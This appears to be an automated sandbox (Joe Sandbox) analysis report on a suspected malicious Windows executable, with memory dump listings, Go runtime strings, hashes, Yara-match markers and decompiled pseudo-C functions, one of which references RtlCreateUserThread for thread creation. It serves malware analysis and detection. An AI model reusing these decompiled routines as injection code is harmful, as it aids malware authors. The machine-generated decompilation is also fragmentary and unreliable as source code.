                                                                                                                            0x0130ab6f
                                                                                                                            0x0130ab6f
                                                                                                                            0x0130ab1b
                                                                                                                            0x0130ab1b
                                                                                                                            0x0130ab1b
                                                                                                                            0x0130ab20
                                                                                                                            0x0130ab27
                                                                                                                            0x0130ac36
                                                                                                                            0x0130ac36
                                                                                                                            0x0130ac40
                                                                                                                            0x0130ac51
                                                                                                                            0x0130ac60
                                                                                                                            0x0130ac71
                                                                                                                            0x0130ac80
                                                                                                                            0x0130ac85
                                                                                                                            0x0130ac8a
                                                                                                                            0x0130ac96
                                                                                                                            0x0130aca0
                                                                                                                            0x00000000
                                                                                                                            0x0130ab2d
                                                                                                                            0x0130ab2d
                                                                                                                            0x0130ab2d
                                                                                                                            0x0130ab40
                                                                                                                            0x0130ab4f
                                                                                                                            0x0130ab54
                                                                                                                            0x0130ab59
                                                                                                                            0x0130ab5e
                                                                                                                            0x0130ab63
                                                                                                                            0x0130ab68
                                                                                                                            0x0130ab68
                                                                                                                            0x0130ab27
                                                                                                                            0x0130ab72
                                                                                                                            0x0130ab76
                                                                                                                            0x0130ac25
                                                                                                                            0x0130ac31
                                                                                                                            0x00000000
                                                                                                                            0x0130ac31
                                                                                                                            0x0130ab7c
                                                                                                                            0x0130ab8c
                                                                                                                            0x0130ab8e
                                                                                                                            0x0130ab92
                                                                                                                            0x0130ab95
                                                                                                                            0x0130ab9c
                                                                                                                            0x0130abb3
                                                                                                                            0x0130abb3
                                                                                                                            0x0130abb8
                                                                                                                            0x0130abc0
                                                                                                                            0x0130abd1
                                                                                                                            0x0130abe0
                                                                                                                            0x0130abf1
                                                                                                                            0x0130ac00
                                                                                                                            0x0130ac05
                                                                                                                            0x0130ac0a
                                                                                                                            0x0130ac20
                                                                                                                            0x00000000
                                                                                                                            0x0130ac20
                                                                                                                            0x0130ab9e
                                                                                                                            0x0130abb2
                                                                                                                            0x00000000
                                                                                                                            0x0130acb3
                                                                                                                            0x0130acb3
                                                                                                                            0x0130acb8
                                                                                                                            0x0130acc0
                                                                                                                            0x0130acca

                                                                                                                            Strings
                                                                                                                            • freeIndex is not validgetenv before env initheadTailIndex overflowinteger divide by zerointerface conversion: kernel32.dll not foundminpc or maxpc invalidnetwork is unreachablenon-Go function at pc=oldoverflow is not nilprotocol not availableprotocol not suppo, xrefs: 0130AC25
                                                                                                                            • s.allocCount= semaRoot queuestack overflowstopm spinningstore64 failedsync.Cond.Waittext file busytoo many linkstoo many usersunexpected EOFunsafe.Pointerwinapi error #work.full != 0 with GC prog<invalid Value>ASCII_Hex_DigitCreateHardLinkWDeviceIoControlDup, xrefs: 0130ABC5
                                                                                                                            • s.allocCount != s.nelems && freeIndex == s.nelemsslice bounds out of range [::%x] with capacity %ysweeper left outstanding across sweep generationsattempt to execute system stack code on user stackcompileCallback: function argument frame too largemallocgc call, xrefs: 0130AC8F
                                                                                                                            • s.nelems= schedtick= span.list= timerslen=, elemsize=, npages = /dev/stderr/dev/stdout: frame.sp=CloseHandleCreateFileWDeleteFileWDives_AkuruExitProcessFreeLibraryGOTRACEBACKGetFileTypeIdeographicMedefaidrinMoveFileExWNandinagariNetShareAddNetShareDelNew_Tai, xrefs: 0130ABE5, 0130AC65
                                                                                                                            • s.allocCount > s.nelemsschedule: holding locksshrinkstack at bad timespan has no free stacksstack growth after forksyntax error in patternsystem huge page size (work.nwait > work.nprocAzerbaijan Standard TimeBangladesh Standard TimeCape Verde Standard TimeCert, xrefs: 0130AC0F
                                                                                                                            • runtime: s.allocCount= s.allocCount > s.nelemsschedule: holding locksshrinkstack at bad timespan has no free stacksstack growth after forksyntax error in patternsystem huge page size (work.nwait > work.nprocAzerbaijan Standard TimeBangladesh Standard TimeCape , xrefs: 0130AC45
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.703513373.0000000001301000.00000020.00000001.01000000.00000004.sdmp, Offset: 01300000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.703502515.0000000001300000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.703892330.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704809118.0000000001465000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704826575.0000000001469000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704834362.000000000146A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704840295.000000000146B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704882959.0000000001479000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704900694.00000000014A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704911959.00000000014A8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704927411.00000000014CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704938861.00000000014D2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704948400.00000000014D5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704984644.00000000014F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.705053337.000000000153F000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.705062638.0000000001540000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_1300000_????????????.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: s.nelems= schedtick= span.list= timerslen=, elemsize=, npages = /dev/stderr/dev/stdout: frame.sp=CloseHandleCreateFileWDeleteFileWDives_AkuruExitProcessFreeLibraryGOTRACEBACKGetFileTypeIdeographicMedefaidrinMoveFileExWNandinagariNetShareAddNetShareDelNew_Tai$freeIndex is not validgetenv before env initheadTailIndex overflowinteger divide by zerointerface conversion: kernel32.dll not foundminpc or maxpc invalidnetwork is unreachablenon-Go function at pc=oldoverflow is not nilprotocol not availableprotocol not suppo$runtime: s.allocCount= s.allocCount > s.nelemsschedule: holding locksshrinkstack at bad timespan has no free stacksstack growth after forksyntax error in patternsystem huge page size (work.nwait > work.nprocAzerbaijan Standard TimeBangladesh Standard TimeCape $s.allocCount != s.nelems && freeIndex == s.nelemsslice bounds out of range [::%x] with capacity %ysweeper left outstanding across sweep generationsattempt to execute system stack code on user stackcompileCallback: function argument frame too largemallocgc call$s.allocCount > s.nelemsschedule: holding locksshrinkstack at bad timespan has no free stacksstack growth after forksyntax error in patternsystem huge page size (work.nwait > work.nprocAzerbaijan Standard TimeBangladesh Standard TimeCape Verde Standard TimeCert$s.allocCount= semaRoot queuestack overflowstopm spinningstore64 failedsync.Cond.Waittext file busytoo many linkstoo many usersunexpected EOFunsafe.Pointerwinapi error #work.full != 0 with GC prog<invalid Value>ASCII_Hex_DigitCreateHardLinkWDeviceIoControlDup
                                                                                                                            • API String ID: 0-1685633480
                                                                                                                            • Opcode ID: ec5f951c43afb22a40b4f3bb1a14f8bef904eae3082de50e57b203c29ff8752b
                                                                                                                            • Instruction ID: a14313655c51917f1f68c7ce6a9b95c00419e68ede17eae249c76abd00bd98e0
                                                                                                                            • Opcode Fuzzy Hash: ec5f951c43afb22a40b4f3bb1a14f8bef904eae3082de50e57b203c29ff8752b
                                                                                                                            • Instruction Fuzzy Hash: F2517072224B80C6CB14EB19F49036FBBA4F7D9B98F845562EA8D07B64DF38C540CB14
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0000025BF8A648F0 Relevance: 7.6, APIs: 6, Instructions: 114COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8a60000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: free$_errno$_callnewhmalloc
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2761444284-0
                                                                                                                            • Opcode ID: f184c75cb4fe9d517fd2803ab05e678bf927ca3280fe055b55ab1d7bbf7b13c2
                                                                                                                            • Instruction ID: 2c6f59663c9e0188c0318931b9e3fa2b3e416783129f1dc286eede8fece02225
                                                                                                                            • Opcode Fuzzy Hash: f184c75cb4fe9d517fd2803ab05e678bf927ca3280fe055b55ab1d7bbf7b13c2
                                                                                                                            • Instruction Fuzzy Hash: A6412523311B8592FE07AB265C0C26E6694F765BAAF695024FD154BF45DF3CC406C32C
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0000025BF8ABEE58 Relevance: 7.6, APIs: 5, Instructions: 90fileCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708528999.0000025BF8AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8AB0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8ab0000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _errno$free$AllocateBoundaryDeleteDescriptorHeap_callnewhfclosefwritemalloc
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1599808278-0
                                                                                                                            • Opcode ID: 1645078cc00e2e9a92d86a82ed4a39e37a9649f3524a32f91329fbbb6e830b1d
                                                                                                                            • Instruction ID: c30f3c8d0abf982aff1eb3a2d379fb8eed50e1f6877c6bf84a1fe72ab08e1708
                                                                                                                            • Opcode Fuzzy Hash: 1645078cc00e2e9a92d86a82ed4a39e37a9649f3524a32f91329fbbb6e830b1d
                                                                                                                            • Instruction Fuzzy Hash: 64217722218E484BEA56FB2C4C597ADB2D1FB88321F64455DB14AC36D2EF34DD01839A
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0000025BF8A75D94 Relevance: 7.6, APIs: 6, Instructions: 87COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 72%
                                                                                                                            			E0000025B25BF8A75D94(long long __rbx, void* __rcx, signed char* __rdx, long long __rdi, long long __rsi, long long __rbp, long long* __r8, void* _a8, void* _a16, void* _a24, void* _a32) {
				void* __r14;
				void* _t30;
				void* _t33;
				void* _t34;
				void* _t35;
				void* _t38;
				void* _t39;
				void* _t40;
				void* _t41;
				void* _t42;
				void* _t44;
				signed char* _t69;
				signed char* _t72;
				void* _t77;
				void* _t87;
				void* _t88;
				void* _t90;
				void* _t91;
				void* _t92;
				int _t94;

				_t44 = _t77;
				 *((long long*)(_t44 + 8)) = __rbx;
				 *((long long*)(_t44 + 0x10)) = __rbp;
				 *((long long*)(_t44 + 0x18)) = __rsi;
				 *((long long*)(_t44 + 0x20)) = __rdi;
				_t92 = __rcx;
				r12d = 0x8000;
				_t72 = __rdx;
				malloc(_t94);
				E0000025B25BF8A8B528(E0000025B25BF8A794CC(_t30, r12d, _t44, _t44, __rdx, 0xf8a8bcb4, __rcx, _t91), r12d, r12d, _t33, _t34, _t35, _t44, _t44, _t44, _t72, __rdi, _t72, _t87, _t90);
				free(_t88);
				if (_t44 == 0xffffffff) goto 0xf8a75eb2;
				_t69 =  &(_t72[0x2c]);
				if (( *_t72 & 0x00000010) == 0) goto 0xf8a75e89;
				_t38 =  *_t69 -  *0xf8a8bcbc; // -40
				if (_t38 != 0) goto 0xf8a75e1f;
				_t39 = _t69[1] -  *0xf8a8bcbd; // -42
				if (_t39 == 0) goto 0xf8a75e95;
				_t40 =  *_t69 -  *0xf8a8bcc0; // 0x23
				if (_t40 != 0) goto 0xf8a75e3f;
				_t41 = _t69[1] -  *0xf8a8bcc1; // 0x3d
				if (_t41 != 0) goto 0xf8a75e3f;
				_t42 = _t69[2] -  *0xf8a8bcc2; // 0x60
				if (_t42 == 0) goto 0xf8a75e95;
				malloc(??);
				E0000025B25BF8A794CC(_t30, r12d, _t44, _t44, _t88, 0xf8a8bac4, _t69);
				E0000025B25BF8A75ED4(_t42, _t44, _t92, _t69, _t69, _t72, _t44, _t72, __r8, _t92);
				r8d = 1;
				 *__r8();
				free(??);
				goto 0xf8a75e95;
				r8d = 0;
				if (E0000025B25BF8A8B530( *__r8(), r12d, r12d, _t33, _t34, _t35, _t44, _t44, _t44, _t72, _t69, _t72, _t87, _t90) != 0) goto 0xf8a75e05;
				return  *0xf8a8b500();
			}























                                                                                                                            0x25bf8a75d94
                                                                                                                            0x25bf8a75d97
                                                                                                                            0x25bf8a75d9b
                                                                                                                            0x25bf8a75d9f
                                                                                                                            0x25bf8a75da3
                                                                                                                            0x25bf8a75db1
                                                                                                                            0x25bf8a75db4
                                                                                                                            0x25bf8a75dc0
                                                                                                                            0x25bf8a75dc3
                                                                                                                            0x25bf8a75de6
                                                                                                                            0x25bf8a75df2
                                                                                                                            0x25bf8a75dfb
                                                                                                                            0x25bf8a75e01
                                                                                                                            0x25bf8a75e08
                                                                                                                            0x25bf8a75e0c
                                                                                                                            0x25bf8a75e12
                                                                                                                            0x25bf8a75e17
                                                                                                                            0x25bf8a75e1d
                                                                                                                            0x25bf8a75e21
                                                                                                                            0x25bf8a75e27
                                                                                                                            0x25bf8a75e2c
                                                                                                                            0x25bf8a75e32
                                                                                                                            0x25bf8a75e37
                                                                                                                            0x25bf8a75e3d
                                                                                                                            0x25bf8a75e42
                                                                                                                            0x25bf8a75e5a
                                                                                                                            0x25bf8a75e6b
                                                                                                                            0x25bf8a75e70
                                                                                                                            0x25bf8a75e7c
                                                                                                                            0x25bf8a75e82
                                                                                                                            0x25bf8a75e87
                                                                                                                            0x25bf8a75e89
                                                                                                                            0x25bf8a75ea3
                                                                                                                            0x25bf8a75ed0

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8a60000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _errno$_snprintffreemalloc$_callnewh_invalid_parameter_noinfo
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 761449704-0
                                                                                                                            • Opcode ID: 82c1dcce8c84437305b8f3727e8478a505c56d4b8d73e2610ad9c0e911897e27
                                                                                                                            • Instruction ID: 54e3b786f7373d4a52906a7304fa441db4e8460496dd9952b3e12710ab26530e
                                                                                                                            • Opcode Fuzzy Hash: 82c1dcce8c84437305b8f3727e8478a505c56d4b8d73e2610ad9c0e911897e27
                                                                                                                            • Instruction Fuzzy Hash: 4B31C423204A8145EE169B126C1D3AD6B51E746FF2F685511FE9507F96DF3CC443A338
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0000025BF8A6E258 Relevance: 7.6, APIs: 5, Instructions: 58fileCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 54%
                                                                                                                            			E0000025B25BF8A6E258(void* __edx, void* __rax, long long __rbx, void* __rcx, long long __rsi, long long __rbp, long long __r8, long long _a8, long long _a16, long long _a24) {
				char _v40;
				void* __rdi;
				void* _t12;
				int _t19;
				void* _t21;
				void* _t31;
				long long _t33;
				void* _t50;
				void* _t62;

				_t60 = __r8;
				_t51 = __rsi;
				_t31 = __rax;
				_a8 = __rbx;
				_a16 = __rbp;
				_a24 = __rsi;
				_t55 = __rcx;
				_t33 = __r8;
				_t12 = malloc(??);
				_t50 = __rax;
				if (__rax == 0) goto 0xf8a6e321;
				r8d = __edx;
				E0000025B25BF8A73230(_t12,  &_v40, __rcx);
				r8d = 0x400;
				if (E0000025B25BF8A73314(_t21, 0x400, __rax, __r8,  &_v40, __rax, __rax, __rsi, __rcx, __r8, _t62) != 0) goto 0xf8a6e2bb;
				free(??);
				goto 0xf8a6e321;
				E0000025B25BF8A7A52C(_t33, _t50, _t33, _t51, _t55, _t60, _t62);
				_t6 = _t31 - 1; // -1
				if (_t6 - 0xfffffffd > 0) goto 0xf8a6e307;
				E0000025B25BF8A73194(E0000025B25BF8A73274( &_v40),  &_v40);
				fwrite(??, ??, ??, ??);
				_t19 = fclose(??);
				goto 0xf8a6e2b4;
				free(??);
				"\\%s: %d"();
				return E0000025B25BF8A6CF60(8, _t19, _t16, _t31, _t55, _t16, _t31);
			}












                                                                                                                            0x25bf8a6e258
                                                                                                                            0x25bf8a6e258
                                                                                                                            0x25bf8a6e258
                                                                                                                            0x25bf8a6e258
                                                                                                                            0x25bf8a6e25d
                                                                                                                            0x25bf8a6e262
                                                                                                                            0x25bf8a6e26c
                                                                                                                            0x25bf8a6e274
                                                                                                                            0x25bf8a6e279
                                                                                                                            0x25bf8a6e27e
                                                                                                                            0x25bf8a6e284
                                                                                                                            0x25bf8a6e28f
                                                                                                                            0x25bf8a6e295
                                                                                                                            0x25bf8a6e29f
                                                                                                                            0x25bf8a6e2b2
                                                                                                                            0x25bf8a6e2b4
                                                                                                                            0x25bf8a6e2b9
                                                                                                                            0x25bf8a6e2be
                                                                                                                            0x25bf8a6e2c6
                                                                                                                            0x25bf8a6e2ce
                                                                                                                            0x25bf8a6e2e2
                                                                                                                            0x25bf8a6e2f5
                                                                                                                            0x25bf8a6e2fd
                                                                                                                            0x25bf8a6e305
                                                                                                                            0x25bf8a6e30a
                                                                                                                            0x25bf8a6e30f
                                                                                                                            0x25bf8a6e335

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8a60000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _errno$free$_callnewhfclosefwritemalloc
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1696598829-0
                                                                                                                            • Opcode ID: 69b733fb4e4ad921f56162dc73f3c2970d3cc0b06fd22b9cef5d603a9174ec46
                                                                                                                            • Instruction ID: bfb7bafd351c54255a329bebeaf06c94a36ecc193bcdb4f6c4e393e9486dba5f
                                                                                                                            • Opcode Fuzzy Hash: 69b733fb4e4ad921f56162dc73f3c2970d3cc0b06fd22b9cef5d603a9174ec46
                                                                                                                            • Instruction Fuzzy Hash: C811A563304E8041EE11E622AC5D3AD5351E785BF1FA44225BE5D07FCADF3CC5058768
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0000025BF8AD4EE4 Relevance: 7.5, APIs: 5, Instructions: 41COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708528999.0000025BF8AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8AB0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8ab0000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _getptd_noexit$__doserrno_errno
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2964073243-0
                                                                                                                            • Opcode ID: ad165a8e472b7aaa892af7d7af0973768dc21987dead314f6370e08c0323a7f5
                                                                                                                            • Instruction ID: 7ed0a4430ac6fc036ee65b51d8e8200b20ecf4e53b16979e43f0907a4871e159
                                                                                                                            • Opcode Fuzzy Hash: ad165a8e472b7aaa892af7d7af0973768dc21987dead314f6370e08c0323a7f5
                                                                                                                            • Instruction Fuzzy Hash: A3014F33525D494EFF1AA764CD5D3A43291EB1A337F64C244F019C69F2D7B844808239
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0000025BF8A842E4 Relevance: 7.5, APIs: 5, Instructions: 31COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E0000025B25BF8A842E4(signed int __ecx, void* __edx, signed int* __rax) {
				void* _t11;
				intOrPtr _t24;
				signed int* _t25;
				signed long long _t29;

				if (__ecx != 0xfffffffe) goto 0xf8a84302;
				E0000025B25BF8A7B82C(__rax);
				 *__rax =  *__rax & 0x00000000;
				E0000025B25BF8A7B89C(__rax);
				 *__rax = 9;
				goto 0xf8a8434f;
				if (__ecx < 0) goto 0xf8a84337;
				if (__ecx -  *0xf8aa7384 >= 0) goto 0xf8a84337;
				_t29 = __ecx * 0x58;
				_t24 =  *((intOrPtr*)(0xf8aa3200 + (__ecx >> 5) * 8));
				if (( *(_t24 + _t29 + 8) & 0x00000001) == 0) goto 0xf8a84337;
				_t25 =  *((intOrPtr*)(_t24 + _t29));
				goto 0xf8a84353;
				E0000025B25BF8A7B82C(_t25);
				 *_t25 =  *_t25 & 0x00000000;
				_t11 = E0000025B25BF8A7B89C(_t25);
				 *_t25 = 9;
				return E0000025B25BF8A7BEC4(_t11);
			}







                                                                                                                            0x25bf8a842eb
                                                                                                                            0x25bf8a842ed
                                                                                                                            0x25bf8a842f2
                                                                                                                            0x25bf8a842f5
                                                                                                                            0x25bf8a842fa
                                                                                                                            0x25bf8a84300
                                                                                                                            0x25bf8a84304
                                                                                                                            0x25bf8a8430c
                                                                                                                            0x25bf8a84322
                                                                                                                            0x25bf8a84326
                                                                                                                            0x25bf8a8432f
                                                                                                                            0x25bf8a84331
                                                                                                                            0x25bf8a84335
                                                                                                                            0x25bf8a84337
                                                                                                                            0x25bf8a8433c
                                                                                                                            0x25bf8a8433f
                                                                                                                            0x25bf8a84344
                                                                                                                            0x25bf8a84357

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8a60000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _getptd_noexit$__doserrno_errno
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2964073243-0
                                                                                                                            • Opcode ID: 5d0a3678b06b18b0d0a5973f5caa8efc4352bf65b823eb5b547b2bae06e3a16f
                                                                                                                            • Instruction ID: 5d43e477a8f1a4ce7212cbbbe5fbf41b31ed0596d174351ba7e1e18ba5db45ca
                                                                                                                            • Opcode Fuzzy Hash: 5d0a3678b06b18b0d0a5973f5caa8efc4352bf65b823eb5b547b2bae06e3a16f
                                                                                                                            • Instruction Fuzzy Hash: 3901AFB3602E4485FE071B24EC893ACA650DB60B37FB58305F63906FD2C73884069A3C
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0000025BF8A72F5C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 118stringCOMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 67%
                                                                                                                            			E0000025B25BF8A72F5C(void* __edi, void* __eflags, signed long long __rax, long long __rbx, void* __rcx, long long __rsi, long long __rbp, long long _a8, long long _a16, char _a24, long long _a32) {
				long long _v48;
				signed long long _v56;
				void* __rdi;
				void* __r13;
				void* _t24;
				intOrPtr _t26;
				char* _t28;
				void* _t33;
				void* _t34;
				void* _t35;
				void* _t38;
				void* _t42;
				intOrPtr _t56;
				char _t57;
				void* _t61;
				void* _t62;
				signed long long _t65;
				signed long long _t68;
				signed long long _t101;
				void* _t104;
				signed long long _t106;
				void* _t116;
				void* _t118;
				signed long long _t119;

				_t68 = __rax;
				_t60 = __edi;
				_a8 = __rbx;
				_a16 = __rbp;
				_a32 = __rsi;
				_t104 = __rcx;
				E0000025B25BF8A73124(0x494, _t61, __rax, __rbx, __rsi, __rbp);
				_t109 = _t68;
				E0000025B25BF8A73278(0x94, _t68);
				r13d = 0x100;
				_t119 = _t68;
				E0000025B25BF8A73278(r13d, _t68);
				_t106 = _t68;
				E0000025B25BF8A73278(r13d, _t68);
				E0000025B25BF8A73278(r13d, _t68);
				E0000025B25BF8A73278(r13d, _t68);
				_a24 = r13d;
				_t24 =  *0xf8a8b468();
				_a24 = r13d;
				E0000025B25BF8A8B5F8(_t24, _t42, 0x494, r13d, __edi, _t61, _t62, _t68, _t68, _t68,  &_a24, _t104, _t106, _t116, _t118);
				_t26 = E0000025B25BF8A6D8EC(r13d, _t68, _t68, _t68);
				r8d = 0x100;
				r13d = _t26;
				if ( *0xf8a8b5f0() == 0) goto 0xf8a73039;
				_t28 = strrchr(??, ??);
				_t65 = _t68;
				if (_t65 == 0) goto 0xf8a73039;
				if (_t65 != 0) goto 0xf8a73040;
				 *_t119 = 0x94;
				E0000025B25BF8A8B600(_t28, _t42, 0, 0x5c, _t60, _t61, _t62, _t68, 0xf8a8bc32, _t119, _t68, _t104, _t106, _t116, _t118);
				 *0xf8aa6b20 =  *((intOrPtr*)(_t119 + 4));
				E0000025B25BF8A6CBB0( *((intOrPtr*)(_t119 + 4)));
				_t33 = E0000025B25BF8A6CC48(E0000025B25BF8A6CBB0( *((intOrPtr*)(_t119 + 8))),  *(_t119 + 0xc) & 0x0000ffff, _t104);
				_t101 = "RtlCreateUserThread"; // 0x74616572436c7452
				_t34 = E0000025B25BF8A6CC18(_t33,  *(_t119 + 0xc) & 0x0000ffff, _t104);
				_t56 =  *((intOrPtr*)("%s\\%s")); // 0x255c7325
				_t35 = E0000025B25BF8A6CC18(_t34, _t56, _t104);
				_t57 = "RtlCreateUserThread"; // 0x436c7452
				E0000025B25BF8A6CC18(E0000025B25BF8A6CC18(_t35, _t57, _t104), r13d, _t104);
				_v48 = 0xf8a8bc32;
				_v56 = _t68;
				_t38 = E0000025B25BF8A794CC(_t42, 0, _t68, _t106, _t101 >> 0x20, 0xf8a8bc38, _t68);
				if ( *((char*)(_t106 + (_t68 | 0xffffffff) + 1)) != 0) goto 0xf8a730de;
				_t39 =  >  ? 0x3a : _t38;
				r8d =  >  ? 0x3a : _t38;
				E0000025B25BF8A6CBD0(_t60, 0xf8a8bc32, _t104);
				return E0000025B25BF8A7320C(_t109, _t106);
			}



























                                                                                                                            0x25bf8a72f5c
                                                                                                                            0x25bf8a72f5c
                                                                                                                            0x25bf8a72f5c
                                                                                                                            0x25bf8a72f61
                                                                                                                            0x25bf8a72f66
                                                                                                                            0x25bf8a72f78
                                                                                                                            0x25bf8a72f80
                                                                                                                            0x25bf8a72f8d
                                                                                                                            0x25bf8a72f90
                                                                                                                            0x25bf8a72f95
                                                                                                                            0x25bf8a72fa1
                                                                                                                            0x25bf8a72fa4
                                                                                                                            0x25bf8a72faf
                                                                                                                            0x25bf8a72fb2
                                                                                                                            0x25bf8a72fc0
                                                                                                                            0x25bf8a72fce
                                                                                                                            0x25bf8a72fdb
                                                                                                                            0x25bf8a72fe3
                                                                                                                            0x25bf8a72ff1
                                                                                                                            0x25bf8a72ff6
                                                                                                                            0x25bf8a73002
                                                                                                                            0x25bf8a73007
                                                                                                                            0x25bf8a73012
                                                                                                                            0x25bf8a7301d
                                                                                                                            0x25bf8a73027
                                                                                                                            0x25bf8a7302f
                                                                                                                            0x25bf8a73032
                                                                                                                            0x25bf8a73037
                                                                                                                            0x25bf8a73043
                                                                                                                            0x25bf8a7304a
                                                                                                                            0x25bf8a73057
                                                                                                                            0x25bf8a73061
                                                                                                                            0x25bf8a7307a
                                                                                                                            0x25bf8a7307f
                                                                                                                            0x25bf8a7308d
                                                                                                                            0x25bf8a73092
                                                                                                                            0x25bf8a7309b
                                                                                                                            0x25bf8a730a0
                                                                                                                            0x25bf8a730b4
                                                                                                                            0x25bf8a730cb
                                                                                                                            0x25bf8a730d0
                                                                                                                            0x25bf8a730d5
                                                                                                                            0x25bf8a730e5
                                                                                                                            0x25bf8a730f1
                                                                                                                            0x25bf8a730f7
                                                                                                                            0x25bf8a730fa
                                                                                                                            0x25bf8a73123

                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8a60000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _snprintfmallocstrrchr
                                                                                                                            • String ID: %s\%s$RtlCreateUserThread
                                                                                                                            • API String ID: 3587327836-2969288844
                                                                                                                            • Opcode ID: 5738243969cd75681ae2df40fc4f50feb926135a9c3fab60068e190284ab21a5
                                                                                                                            • Instruction ID: fd7ac9c3ecfda0f3c91ae6f008ea634a492dc638f862d10847f4791dd1843575
                                                                                                                            • Opcode Fuzzy Hash: 5738243969cd75681ae2df40fc4f50feb926135a9c3fab60068e190284ab21a5
